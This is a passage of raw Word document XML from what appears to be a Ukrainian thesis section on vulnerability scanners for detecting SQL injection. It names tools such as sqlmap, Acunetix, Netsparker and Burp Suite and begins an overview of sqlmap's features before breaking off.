        <w:t xml:space="preserve"> ін’єкцію в додатку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1D3C7" w14:textId="4A5E4CF4" w:rsidR="00355D23" w:rsidRDefault="00355D23" w:rsidP="00355D23">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBB085B" w14:textId="083C4B20" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00355D23">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1AC9B8" w14:textId="7AB94912" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00355D23">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31351E58" w14:textId="77777777" w:rsidR="002F1513" w:rsidRDefault="002F1513" w:rsidP="00355D23">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FB73A9" w14:textId="5F75489F" w:rsidR="00355D23" w:rsidRDefault="00355D23" w:rsidP="00355D23">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc30433130"/>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">8 Використання сканерів вразливостей для знаходження </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00355D23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкцій</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3853B2BD" w14:textId="2490D8F6" w:rsidR="00355D23" w:rsidRDefault="00355D23" w:rsidP="00355D23">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3364AE0B" w14:textId="01DE0381" w:rsidR="00101F0F" w:rsidRDefault="00355D23" w:rsidP="00355D23">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355D23">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Сканери вразливостей - це програмні або апаратні засоби, що служать для здійснення діагностики та моніторингу мережевих комп'ютерів, що дозволяє сканувати мережі, комп'ютери та програми на предмет виявлення можливих проблем у системі безпеки, оцінювати і усувати уразливості.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[41]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3919B8" w14:textId="07AA0A1C" w:rsidR="00050B3E" w:rsidRDefault="00050B3E" w:rsidP="00355D23">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Існують наступні типи сканерів вразливостей:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21528673" w14:textId="509D89A9" w:rsidR="00050B3E" w:rsidRDefault="00050B3E" w:rsidP="00050B3E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00050B3E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Сканери портів</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B6EA97" w14:textId="3F7C3F61" w:rsidR="00050B3E" w:rsidRDefault="00050B3E" w:rsidP="00050B3E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Сканери, які визначають та досліджують топологію комп’ютерної мережі;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121EB7C2" w14:textId="12A38304" w:rsidR="00050B3E" w:rsidRDefault="00050B3E" w:rsidP="00050B3E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Сканери, які перевіряють мережеві сервіси на вразливості;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E73E67" w14:textId="2472E305" w:rsidR="0065383C" w:rsidRPr="008F0C58" w:rsidRDefault="00050B3E" w:rsidP="008F0C58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CGI</w:t>
      </w:r>
      <w:r w:rsidRPr="0065383C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0065383C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>сканери ці сканери здатні виявити вразливі скрипти.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C609454" w14:textId="057DD87F" w:rsidR="0065383C" w:rsidRPr="0065383C" w:rsidRDefault="0065383C" w:rsidP="0065383C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Існують наступні сканери для виявлення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0065383C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкцій:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB8573B" w14:textId="0DC942A7" w:rsidR="00355D23" w:rsidRPr="00C3144E" w:rsidRDefault="00C3144E" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>qlmap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76844827" w14:textId="10BF5C82" w:rsidR="00C3144E" w:rsidRPr="00C3144E" w:rsidRDefault="00C3144E" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Acunetix;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184CA785" w14:textId="4C3F06F1" w:rsidR="00C3144E" w:rsidRPr="00C3144E" w:rsidRDefault="00C3144E" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Netsparker;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F264C" w14:textId="2D3D20DE" w:rsidR="00C3144E" w:rsidRPr="00C3144E" w:rsidRDefault="00C92CC5" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="00C3144E" w:rsidRPr="00C3144E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F20AE72" w14:textId="0164DB29" w:rsidR="00C3144E" w:rsidRDefault="00C3144E" w:rsidP="00C3144E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Опис та використання </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153862A7" w14:textId="19EC1754" w:rsidR="00C3144E" w:rsidRPr="008F0C58" w:rsidRDefault="00C3144E" w:rsidP="00C3144E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap - </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>це інструмент з відкритим вихідним кодом для тестування на проникнення, який автоматизує процес виявлення і експлуатації уразливості SQL-ін'єкції і захоплення серверів баз даних. Він поставляється з потужним двигуном виявлення і багатьма функціями для кінцевого тестера на проникнення, має широкий набір можливостей, починаючи від збору відбитків баз даних, до доступу до файлової системи і виконання команд в операційній системі.</w:t>
      </w:r>
      <w:r w:rsidR="008F0C58">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F0C58">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[42]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6726D4D3" w14:textId="1872CD87" w:rsidR="00C3144E" w:rsidRDefault="00C3144E" w:rsidP="00C3144E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Особливості </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sqlmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07437802" w14:textId="0A086978" w:rsidR="00C3144E" w:rsidRDefault="001E6D6B" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Повна підтримка для таких систем управління базами даних як </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>IBM</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Firebird</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Sybase</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>SAP</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>MaxDB</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>HSQLDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A77CB03" w14:textId="70333970" w:rsidR="001E6D6B" w:rsidRPr="001E6D6B" w:rsidRDefault="001E6D6B" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Повна підтримка шести технік SQL-ін'єкцій: </w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Boolean-based blind, time-based blind, error-based, UNION query-based, out-of-band</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A57A22C" w14:textId="61C139AE" w:rsidR="001E6D6B" w:rsidRDefault="001E6D6B" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
